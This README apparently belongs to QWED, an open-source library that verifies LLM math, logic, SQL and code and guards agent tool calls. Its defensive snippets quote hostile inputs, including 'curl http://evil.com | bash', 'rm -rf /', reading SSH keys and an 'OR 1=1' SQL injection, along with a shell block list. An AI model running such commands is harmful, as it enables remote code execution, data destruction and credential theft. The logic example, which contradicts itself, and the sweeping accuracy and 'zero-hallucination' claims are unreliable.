qwed 5.0.0

The Deterministic Verification Protocol for AI - 11 verification engines for math, logic, code, SQL, facts, images, and more. Now with Agentic Security Guards.

QWED Protocol

Model-Agnostic Trust Boundary for AI Systems

QWED Verification - Production-grade deterministic trust boundary for LLMs, AI agents, and tool-driven systems. Works with ANY LLM - OpenAI, Anthropic, Gemini, Llama (via Ollama), or any local model. Detect and prevent AI hallucinations through multiple verification engines • agentic security guards • process determinism. Your LLM, Your Choice, Our Verification.

Don't fix the liar. Verify the lie.
QWED verifies outputs, processes, and tool interactions before they enter production.
QWED does not reduce hallucinations. It makes them irrelevant.

If critical AI output cannot be verified, QWED can block it before production.

🌐 Model Agnostic: Local ($0) • Budget ($5/mo) • Premium ($100/mo) - You choose!

💖 Support QWED Development:

Quick Start · 🆕 qwed init · ⚡ QWEDLocal · The Problem · The 11 Engines · 🔌 Integration · ⚡ QWEDLocal · 🖥️ CLI · 🆓 Ollama (FREE!) · 📖 Full Documentation

---

🎯 Where QWED Fits First

Use QWED when an LLM or AI agent must not guess:

• Verify AI-generated math, logic, SQL, code, and schemas before execution
• Protect RAG pipelines against prompt injection and poisoned context
• Inspect AI agent tool calls before they reach external systems
• Enforce deterministic process steps in high-stakes workflows

QWED is strongest when AI output touches money, code, tools, policy, or production systems.

⚡ One-Line Example

LLM says: DELETE FROM users WHERE id=1 OR 1=1

QWED says: ❌ Blocked — SQL injection detected before execution.

---

QWED does not just validate answers — it defines what AI is allowed to trust.

---

⚠️ What QWED Is (and Isn't)

QWED is: An open-source engineering layer that combines symbolic verification, security guards, and deterministic process checks for AI systems.

QWED is NOT: Novel research. We don't claim algorithmic innovation. We claim practical integration for production use cases.

Works when: Developer provides ground truth (expected values, schemas, contracts) and LLM generates structured output.

Doesn't work when: Specs come from natural language, outputs are freeform text, or verification domain is unsupported.

🔬 On "Deterministic" Verification

QWED uses deterministic computation (no neural networks, no embeddings, no vibes) wherever possible. Math, Logic, SQL, Code, and Schema engines produce 100% reproducible results using symbolic solvers. For fact-checking, we use TF-IDF (not embeddings) because it's transparent and inspectable—same query always returns same score. For image/reasoning domains that require LLM fallback, we clearly mark outputs as HEURISTIC in the response.

🔐 Ecosystem Trust & Infrastructure

QWED is supported by leading open-source infrastructure and security ecosystems, ensuring production-grade reliability for AI verification workloads.

Sponsored & Supported Programs

• Docker Sponsored Open Source (DSOS) Verified container distribution, Docker Scout security insights, autobuilds, and pull rate-limit removal.
• Snyk Open Source Security Program Enterprise-grade SAST, dependency scanning, and container vulnerability monitoring.
• CircleCI Open Source Program Scalable CI/CD pipelines with high-volume build credits.
• Cloudflare Project Alexandria Edge compute (Workers), CDN, and security infrastructure sponsorship.
• Sentry Observability, error tracking, and verification risk monitoring.
• Netlify Open Source Plan Frontend hosting and deployment infrastructure.
• Mintlify OSS Program Documentation hosting and developer experience tooling.

Why This Matters

Verification infrastructure must itself be verifiable. These ecosystem partnerships ensure that:

• Containers are securely built and distributed
• Code is continuously scanned for vulnerabilities
• Supply chain risks are minimized
• Verification failures are observable and auditable
• Deployments scale reliably across environments

QWED's mission is to provide deterministic trust for AI systems — and that trust begins with the infrastructure it runs on.

---

📦 Installation & Quick Start

Python SDK (PyPI)

pip install qwed
# Note: Installs core engines (Math, Code, Facts).
# For full features (SQL, Logic/Z3, CrossHair):
# pip install "qwed[full]"

Go SDK

go get github.com/QWED-AI/qwed-verification/sdk-go

TypeScript SDK (npm)

npm install @qwed-ai/sdk

Docker

docker pull qwedai/qwed-verification

From Source

git clone https://github.com/QWED-AI/qwed-verification.git
cd qwed-verification
pip install -e .

---

from qwed_sdk import QWEDClient

client = QWEDClient(api_key="your_key")

# The LLM says: "Derivative of x^2 is 3x" (Hallucination!)
response = client.verify_math(
    query="What is the derivative of x^2?",
    llm_output="3x" 
)

print(response)
# -> ❌ CORRECTED: The derivative is 2x. (Verified by SymPy)

💡 Want to use QWED locally without our backend? Check out QWEDLocal - works with Ollama (FREE), OpenAI, Anthropic, or any LLM provider.

---

🚀 First-Time Setup: qwed init

The fastest way to get QWED running with your LLM provider:

mkdir my-project && cd my-project
qwed init

What happens:

[QWED] Initializing verification engines...
  [ok] SymPy    math engine ready
  [ok] Z3       logic engine ready
  [ok] AST      code engine ready
  [ok] SQLGlot  sql engine ready

Running verification suite...
  [ok] 2+2=5                    -> BLOCKED
  [ok] x>5 AND x<3              -> UNSAT
  [ok] SELECT * WHERE 1=1       -> BLOCKED
  [ok] eval(user_input)         -> BLOCKED

All engines verified. QWED is operational.

Step 1/3: Select your LLM provider (NVIDIA, OpenAI, Anthropic, Gemini, Custom)
Step 2/3: Enter API key — tested with 5s timeout, stored securely (.env, 0600)
Step 3/3: QWED API key generated — shown once, save it

QWED is ready.

After init, verify your setup:

qwed doctor

[QWED Doctor] Health Report
  [ok] ACTIVE_PROVIDER  openai_compat
  [ok] DATABASE_URL     sqlite:///qwed.db
  [ok] API key          valid (tested)
  [ok] SymPy            math engine ready
  [ok] Z3               logic engine ready
  [ok] SQLGlot          sql engine ready
  [ok] AST              code engine ready

All checks passed.

qwed test     # 12 deterministic tests — all must pass before production

[QWED Test] Running verification suite...
  [pass] Math:   derivative of x^2 → 2x
  [pass] Math:   integral of x^2 → x^3/3
  [pass] Logic:  x>5 AND x<3 → UNSAT
  [pass] SQL:    SELECT * WHERE 1=1 → BLOCKED
  [pass] Code:   eval(user_input) → BLOCKED
  ... 7 more
12/12 passed ✅

Supported providers:

qwed init --provider nvidia     # NVIDIA NIM
qwed init --provider openai     # OpenAI
qwed init --provider anthropic  # Anthropic Claude
qwed init --provider gemini     # Google Gemini
qwed init --provider custom     # Any OpenAI-compatible API

CI/CD friendly — no interactive prompts:

# Using flags
qwed init --non-interactive --provider nvidia

# Using env vars
NVIDIA_API_KEY=xxx qwed init --non-interactive

---

🚨 The LLM Hallucination Problem: Why AI Can't Be Trusted

Everyone is trying to fix AI hallucinations by Fine-Tuning (teaching it more data).

This is like forcing a student to memorize 1,000,000 math problems.

What happens when they see the 1,000,001st problem? They guess.

🎯 Use Cases & Applications

QWED is designed for industries where AI errors have real consequences:

Industry	Use Case	Risk Without QWED
🤖 AI Agents	Tool-call verification, MCP defense, process checks	Unsafe tool execution
🏦 Financial Services	Transaction validation, fraud detection	$12,889 error per miscalculation
🏥 Healthcare AI	Drug interaction checking, diagnosis verification	Patient safety risks
⚖️ Legal Tech	Contract analysis, compliance checking	Regulatory violations
📚 Educational AI	AI tutoring, assessment systems	Misinformation to students
🏭 Manufacturing	Process control, quality assurance	Production defects

---

✅ The Solution: Deterministic Trust Boundary

QWED is an open-source deterministic verification layer combining symbolic solvers and practical security guards for LLM systems.

We combine:

• Neural Networks (LLMs) for natural language understanding
• Symbolic Reasoning (SymPy, Z3, AST) for deterministic verification

🛡️ New in v4: Agent Security

QWED now verifies not only outputs, but agent toolchains:

• MCP Poison Guard
• RAGGuard
• ExfiltrationGuard
• ProcessVerifier

The Core Philosophy: "The Untrusted Translator"

QWED operates on a strict principle: Don't trust the LLM to compute or judge; trust it only to translate.

Example Flow:

User Query: "If all A are B, and x is A, is x B?"

↓ (LLM translates)

Z3 DSL: Implies(A(x), B(x))

↓ (Z3 proves)

Result: TRUE (Proven by formal logic)

The LLM is an Untrusted Translator. The Symbolic Engine is the Trusted Verifier.

---

💡 How QWED Compares: The "Orchestrator" Strategy

We don't reinvent the wheel. We unify the best symbolic engines into a single LLM-Verification Layer.

QWED vs Point Solutions (Libraries)

QWED wraps best-in-class libraries, abstracting their complex DSLs into a simple natural language interface for LLMs.

Library	Domain	QWED's Role
Pandera	Dataframe Validation	Orchestrator: QWED uses Pandera for verify_data schema checks.
CrossHair	Code Contracts	Orchestrator: QWED uses CrossHair for formal python verification.
SymPy	Symbolic Math	Orchestrator: QWED translates "Derivative of x^2" → SymPy execution.
Z3 Prover	Theorem Proving	Orchestrator: QWED translates logical paradoxes → Z3 constraints.

QWED vs AI Guardrails (Frameworks)

Feature	QWED Protocol	NeMo Guardrails	LangChain Evaluators
The "Judge"	Deterministic Solver (Z3/SymPy)	Semantic Matcher (Embeddings)	Another LLM (GPT-4)
Mechanism	Translation to DSL	Vector Similarity	Prompt Engineering
Verification Type	Mathematical Proof	Policy Adherence	Consensus/Opinion
False Positives	~0% (Logic-based)	Medium (Semantic drift)	High (Subjectivity)
Privacy	✅ 100% Local	❌ Cloud-based (usually)	❌ Cloud-based

QWED differs because it provides PROOF, not just localized safety checks.

---

🔬 The Verification Engines

QWED routes queries to specialized engines that act as DSL interpreters:

┌──────────────┐
│  User Query  │
└──────┬───────┘
       │
       ▼
┌────────────────────────┐
│  LLM (The Translator)  │
│  "Translate to Math"   │
└──────┬─────────────────┘
       │ DSL / Code
       ▼
┌─────────────────────────────┐
│      QWED Protocol          │
│  (Zero-Trust Verification)  │
├─────────────────────────────┤
│ 🧮 SymPy   ⚖️ Z3   🛡️ AST   │
└──────────────┬──────────────┘
       │ Proof / Result
   ┌───┴───┐
   ▼       ▼
❌ Reject ✅ Verified
           │
           ▼
  ┌─────────────────┐
  │ Your Application│
  └─────────────────┘

---

QWED 🆚 Traditional AI Safety Approaches

Approach	Accuracy	Deterministic	Explainable	Best For
QWED Verification	✅ 99%+	✅ Yes	✅ Full trace	Production AI
Fine-tuning / RLHF	⚠️ ~85%	❌ No	❌ Black box	General improvement
RAG (Retrieval)	⚠️ ~80%	❌ No	⚠️ Limited	Knowledge grounding
Prompt Engineering	⚠️ ~70%	❌ No	⚠️ Limited	Quick fixes
Guardrails	⚠️ Variable	❌ No	⚠️ Reactive	Content filtering

QWED doesn't replace these - it complements them with mathematical certainty.

---

🔬 The Verification Engines: Examples

QWED routes queries to specialized engines that act as DSL interpreters.

1. 🧮 Math Verifier (SymPy)

Use Case: Financial logic, Physics, Calculus.

# LLM: "The integral of x^2 is 3x" (Wrong)
client.verify_math(
    query="Integral of x^2",
    llm_output="3x"
)
# -> ❌ CORRECTED: x^3/3 (Verified by SymPy)

2. ⚖️ Logic Verifier (Z3 Prover)

Use Case: Contract analysis, finding contradictions.

# LLM: "Start date is Monday. End date is 3 days later, which is Thursday."
client.verify_logic(
    query="If start is Monday, what is 3 days later?",
    llm_output="Thursday"
)
# -> ❌ WRONG: 3 days after Monday is Thursday. 
# Wait, actually: Mon -> Tue(1) -> Wed(2) -> Thu(3).
# But if it finds a contradiction:
# "All politicians are liars. Bob is a politician. Bob tells the truth."
# -> ❌ CONTRADICTION FOUND (Proven by Z3)

3. 🗄️ SQL Verifier (SQLGlot)

Use Case: preventing SQL Injection and Hallucinated Columns.

# LLM: "Delete all users where id=1 OR 1=1"
client.verify_sql(
   query="Delete user 1",
   schema="CREATE TABLE users (id INT)",
   llm_output="DELETE FROM users WHERE id=1 OR 1=1"
)
# -> ❌ SECURITY ALERT: SQL Injection Detected (Always True condition)

4. 🛡️ Code Verifier (AST + CrossHair)

Use Case: Detecting harmful Python/JS code.

client.verify_code(
    code="import os; os.system('rm -rf /')"
)
# -> ❌ SECURITY ALERT: Forbidden function 'os.system' detected.

5. 🔐 System Integrity (Shell & Config Guard)

Use Case: Preventing RCE in AI Agents, detecting leaked secrets.

# Block dangerous shell commands (rm, sudo, curl|bash)
client.verify_shell_command("curl http://evil.com | bash")
# -> ❌ BLOCKED: PIPE_TO_SHELL (RCE risk)

# Sandbox file access
client.verify_file_access("~/.ssh/id_rsa")
# -> ❌ BLOCKED: FORBIDDEN_PATH (SSH keys protected)

# Scan config for plaintext secrets
client.verify_config({"api_key": "sk-proj-abc123..."})
# -> ❌ SECRETS_DETECTED: OPENAI_API_KEY at 'api_key'

Full list of engines: Math, Logic, SQL, Code, System Integrity, Stats (Pandera), Fact (TF-IDF), Image, Consensus.

---

📊 The Proof: Why Enterprise AI Needs QWED Verification

We benchmarked Claude Opus 4.5 (one of the world's best LLMs) on 215 critical tasks.

Finding	Implication
Finance: 73% accuracy	Banks can't use raw LLM for calculations
Adversarial: 85% accuracy	LLMs fall for authority bias tricks
QWED: 100% error detection	All 22 errors caught before production

QWED doesn't compete with LLMs. We ENABLE them for production use.

📄 Full Benchmark Report →

---

🧠 The QWED Philosophy: Verification Over Correction

❌ Wrong Approach	✅ QWED Approach
"Let's fine-tune the model to be more accurate"	"Let's verify the output with math"
"Trust the AI's confidence score"	"Trust the symbolic proof"
"Add more training data"	"Add a verification layer"
"Hope it doesn't hallucinate"	"Catch hallucinations deterministically"

QWED = Query with Evidence and Determinism

Probabilistic systems should not be trusted with deterministic tasks. If it can't be verified, it doesn't ship.

---

🔌 LLM Framework Integrations

Already using an Agent framework? QWED drops right in.

🦜 LangChain (Native Integration)

Install: pip install 'qwed[langchain]'

from qwed_sdk.integrations.langchain import QWEDTool
from langchain.agents import initialize_agent
from langchain_openai import ChatOpenAI

# Initialize QWED verification tool
tool = QWEDTool(provider="openai", model="gpt-4o-mini")

# Add to your agent
llm = ChatOpenAI()
agent = initialize_agent(tools=[tool], llm=llm)

# Agent automatically uses QWED for verification
agent.run("Verify: what is the derivative of x^2?")

🤖 CrewAI

from qwed_sdk.integrations.crewai import QWEDVerifiedAgent

agent = QWEDVerifiedAgent(role="Analyst", verify_math=True)

🦙 LlamaIndex

from qwed_sdk.integrations.llamaindex import QWEDQueryEngine

# Add Fact Guard verification to any query engine
verified_engine = QWEDQueryEngine(base_engine, verify_facts=True)

---

🔒 Security & Privacy

In high-stakes industries (Finance, Legal, Healthcare), you cannot send sensitive data to an external API for verification.

QWED is designed for Zero-Trust environments:

• 100% Local Execution: QWED runs inside your infrastructure (Docker/Kubernetes). Data never leaves your VPC.
• Privacy Shield (New): Built-in PII Masking redacts Credit Cards, SSNs, and Emails before they touch the LLM.
• No "Model Training": We do not train on your data. QWED is a deterministic code execution engine, not a generative model.
• Audit Logs: Every verification generates a cryptographically signed receipt (JWT) proving that the check passed.

"Don't trust the AI. Trust the Code."

---

🏛️ Authority Verification (Phase 9)

• No More Fake Cases: CitationGuard (Legal) verifies legal citations against valid reporter formats (e.g., Bluebook).
• Banking Ready: ISOGuard (Finance) ensures AI payments meet ISO 20022 standards.
• Ethical AI: DisclaimerGuard (Core) enforces safety warnings in regulated outputs.

---

🗺️ Roadmap

We are building the Universal Verification Standard for the agentic web.

• v4.0 (Live): Agentic Security Guards (MCP, RAG, Exfiltration), Process Determinism, and Core Engines.
• Q2 2026 - v4.1: QWED Client-Side (WebAssembly) enables verification in the browser.
• Q3 2026 - v4.2: Distributed Verification Network introduces a decentralized network of verifier nodes.

---

🌐 The QWED Ecosystem

QWED verification is available as specialized packages for different industries:

📦 Packages

Package	Description	Install	Repo
qwed	Core verification + security guards	pip install qwed	GitHub
qwed-finance 🏦	Banking, loans, NPV, ISO 20022	pip install qwed-finance	GitHub
qwed-legal 🏛️	Contracts, deadlines, citations, jurisdiction	pip install qwed-legal	GitHub
qwed-infra ☁️	IaC verification (Terraform, IAM, Cost)	pip install qwed-infra	GitHub
qwed-ucp 🛒	E-commerce cart/transaction verification	pip install qwed-ucp	GitHub
qwed-mcp 🔌	Claude Desktop MCP integration	pip install qwed-mcp	GitHub
open-responses 🤖	OpenAI Responses API + QWED guards	pip install qwed-open-responses	GitHub
qwed-tax 💸	Tax compliance & withholding verification middleware	pip install qwed-tax	GitHub

🎬 GitHub Actions

Use QWED verification in your CI/CD pipelines:

# Secret Scanning - Detect leaked API keys
- uses: QWED-AI/qwed-verification@v3
  with:
    action: scan-secrets
    paths: "**/*.env,**/*.json"

# Code Security - Find dangerous patterns (eval, exec, subprocess)
- uses: QWED-AI/qwed-verification@v3
  with:
    action: scan-code
    paths: "**/*.py"
    output_format: sarif  # Integrates with GitHub Security tab

# Shell Script Linting - Block RCE patterns (curl|bash, rm -rf)
- uses: QWED-AI/qwed-verification@v3
  with:
    action: verify-shell
    paths: "**/*.sh"

# LLM Output Verification (Math, Logic, Code)
- uses: QWED-AI/qwed-verification@v3
  with:
    action: verify
    engine: math
    query: "Integral of x^2"
    llm_output: "x^3/3"

Action	Use Case	Marketplace
QWED-AI/qwed-verification@v3	NEW! Secret scanning, code analysis, SARIF output	View
QWED-AI/qwed-legal@v0.2.0	Contract deadline, jurisdiction, citations	View
QWED-AI/qwed-finance@v1	NPV, loan calculations, compliance	View
QWED-AI/qwed-ucp@v1	E-commerce transactions	View

🎓 Free Course on AI Verification

Learning Path: From Zero to Production-Ready AI Verification

• 💡 Artist vs. Accountant: Why LLMs are creative but terrible at math
• 🧮 Neurosymbolic AI: How deterministic verification catches errors
• 🏗️ Production Patterns: Build guardrails that actually work
• 🦜 Framework Integration: LangChain, LlamaIndex, and more

🚀 Start the Free Course →

📖 Full Ecosystem Documentation

---

🌍 Multi-Language SDK Support

Language	Package	Status
🐍 Python	qwed	✅ Available on PyPI
🟦 TypeScript	@qwed-ai/sdk	✅ Available on npm
🐹 Go	qwed-go	✅ Available
🦀 Rust	qwed	✅ Available on crates.io

# Python
pip install qwed

# Go
go get github.com/QWED-AI/qwed-verification/sdk-go

# TypeScript
npm install @qwed-ai/sdk

# Rust
cargo add qwed

---

🎯 Real Example: The $12,889 Bug

User asks AI: "Calculate compound interest: $100K at 5% for 10 years"

GPT-4 responds: "$150,000"
(Used simple interest by mistake)

With QWED:

response = client.verify_math(
    query="Compound interest: $100K, 5%, 10 years",
    llm_output="$150,000"
)
# -> ❌ INCORRECT: Expected $162,889.46
#    Error: Used simple interest formula instead of compound

Cost of not verifying: $12,889 error per transaction 💸

---

🧑‍💻 Development & Testing

Building from Source

# Clone and install in development mode
git clone https://github.com/QWED-AI/qwed-verification.git
cd qwed-verification
pip install -e ".[dev]"

Running Tests

# Run all tests
pytest tests/ -v

# Run with coverage
pytest tests/ -v --cov=src/qwed_new --cov-report=html

# Run specific test file
pytest tests/test_math_verifier.py -v

Static Analysis & Linting

QWED uses multiple tools for code quality:

# Type checking
mypy src/

# Linting
ruff check src/

# Security scanning (Snyk integration in CI)
# See .github/workflows/ci.yml

Continuous Integration

All PRs run through GitHub Actions:

• ✅ Unit tests (Python 3.10, 3.11, 3.12)
• ✅ Type checking (mypy)
• ✅ Security scanning (Snyk, CodeRabbit)
• ✅ Coverage reporting (Codecov)

See .github/workflows/ci.yml for details.

---

❓ Frequently Asked Questions

Q: Is QWED for AI agents or only LLM outputs?

A: Both. QWED started as deterministic output verification and now includes trust guards for agent toolchains, RAG pipelines, and process validation.

Q: How does QWED differ from RAG (Retrieval Augmented Generation)?

A: RAG improves the input to the LLM by grounding it in documents. QWED verifies the output deterministically. RAG adds knowledge; QWED adds certainty.

Q: Can QWED work with any LLM?

A: Yes! QWED is model-agnostic and works with GPT-4, Claude, Gemini, Llama, Mistral, and any other LLM. We verify outputs, not models.

Q: Does QWED replace fine-tuning?

A: No. Fine-tuning makes models better at tasks. QWED verifies they got it right. Use both.

Q: Is QWED open source?

A: Yes! Apache 2.0 license. Enterprise features (audit logs, multi-tenancy) are in a separate repo.

Q: What's the latency overhead?

A: Typically <100ms for most verifications. Math and logic proofs are instant. Consensus checks take longer (multiple API calls).

Q: Do I need to run qwed init every time?

A: No. Once initialized, QWED reads from .env. Re-run only when changing providers or rotating keys.

---

📚 Documentation & Resources

Main Documentation:

Resource	Description
📖 Full Documentation	Complete API reference and guides
🔧 API Reference	Endpoints and schemas
⚡ QWEDLocal Guide	Client-side verification setup
🖥️ CLI Reference	Command-line interface
🔒 PII Masking Guide	HIPAA/GDPR compliance
🆓 Ollama Integration	Free local LLM setup

Project Documentation:

Resource	Description
📊 Benchmarks	LLM accuracy testing results
🗺️ Project Roadmap	Future features and timeline
📋 Changelog	Version history summary
📜 Release Notes	Detailed version release notes
🎬 GitHub Action Guide	CI/CD integration
🏗️ Architecture	System design and engine internals

Community:

Resource	Description
🤝 Contributing Guide	How to contribute to QWED
GOVERNANCE.md	Project governance & roles
ROADMAP.md	Future plans & vision
📜 Code of Conduct	Community guidelines
🔒 Security Policy	Reporting vulnerabilities
📖 Citation	Academic citation format

---

🏢 Enterprise Features

Need observability, multi-tenancy, audit logs, or compliance exports?

📧 Contact: rahul@qwedai.com

---

📄 License

Apache 2.0 - See LICENSE

---

⭐ Star History

If chart doesn't load, click here for alternatives

Current Stars:

View trend: Star History Page

---

👥 Contributors

---

📄 Citation

If you use QWED in your research or project, please cite our archived paper:

@software{dass2025qwed,
  author = {Dass, Rahul},
  title = {QWED Protocol: Deterministic Verification for Large Language Models},
  year = {2025},
  publisher = {Zenodo},
  version = {v1.0.0},
  doi = {10.5281/zenodo.18110785},
  url = {https://doi.org/10.5281/zenodo.18110785}
}

Plain text:

Dass, R. (2025). QWED Protocol: Deterministic Verification for Large Language Models (Version v1.1.0). Zenodo. https://doi.org/10.5281/zenodo.18110785

---

✅ Using QWED in Your Project?

Add these badges to your README to show you're using verified AI:

Badge Variants

Badge	Use Case	Markdown
	General - Any QWED integration	See below
	Math/Logic/Code/SQL/Schema - No LLM fallback	See below
	Fact/Image/Consensus - Hybrid approach	See below

Markdown Code

General Badge:

[![Verified by QWED](https://img.shields.io/badge/Verified_by-QWED-00C853?style=flat&logo=checkmarx)](https://github.com/QWED-AI/qwed-verification#%EF%B8%8F-what-does-verified-by-qwed-mean)

100% Deterministic (for Math, Logic, Code, SQL, Schema engines):

[![100% Deterministic](https://img.shields.io/badge/100%25_Deterministic-QWED-0066CC?style=flat&logo=checkmarx)](https://docs.qwedai.com/docs/engines/overview#deterministic-first-philosophy)

AI + Verification (for Fact, Image, Consensus engines):

[![AI + Verification](https://img.shields.io/badge/AI_%2B_Verification-QWED-9933CC?style=flat&logo=checkmarx)](https://docs.qwedai.com/docs/engines/overview#deterministic-first-philosophy)

These badges tell users exactly what level of verification your application uses.

🛡️ What does "Verified by QWED" mean?

When you see the [Verified by QWED] badge on a repository or application, it is a technical guarantee, not a marketing claim.

It certifies that the software adheres to the QWED Protocol for AI Safety:

1. The Zero-Hallucination Warranty: The application does not rely on LLM probabilities for Math, Logic, or Code. It uses Deterministic Engines (SymPy, Z3, AST) to prove correctness before outputting data.

2. The "Untrusted Translator" Architecture: The system treats the LLM solely as a translator (Natural Language → DSL), never as a judge. If the translation cannot be mathematically proven, the system refuses to answer rather than guessing.

3. Cryptographic Accountability: The application generates JWT-based Attestations (ES256 signatures) for its critical operations. Every "Verified" output comes with a cryptographic receipt proving a solver validated it.

In short: The badge means "We don't trust the AI. We trust the Math."

---

🙏 Contributors Wanted

We're actively looking for contributors! Whether you're a first-timer or experienced developer, there's a place for you.

🎯 Ways to Contribute

Area	What We Need
🧪 Testing	Add test cases for edge scenarios
📝 Docs	Improve examples and tutorials
🌍 i18n	Translate docs to other languages
🔧 SDKs	Enhance Go/Rust/TypeScript SDKs
🐛 Bugs	Fix issues or report new ones

→ Read CONTRIBUTING.md | → Browse Good First Issues

---

⭐ Star us if you believe AI needs verification

Ready to trust your AI?

"Safe AI is the only AI that scales."

Contribute · Architecture · Security · Documentation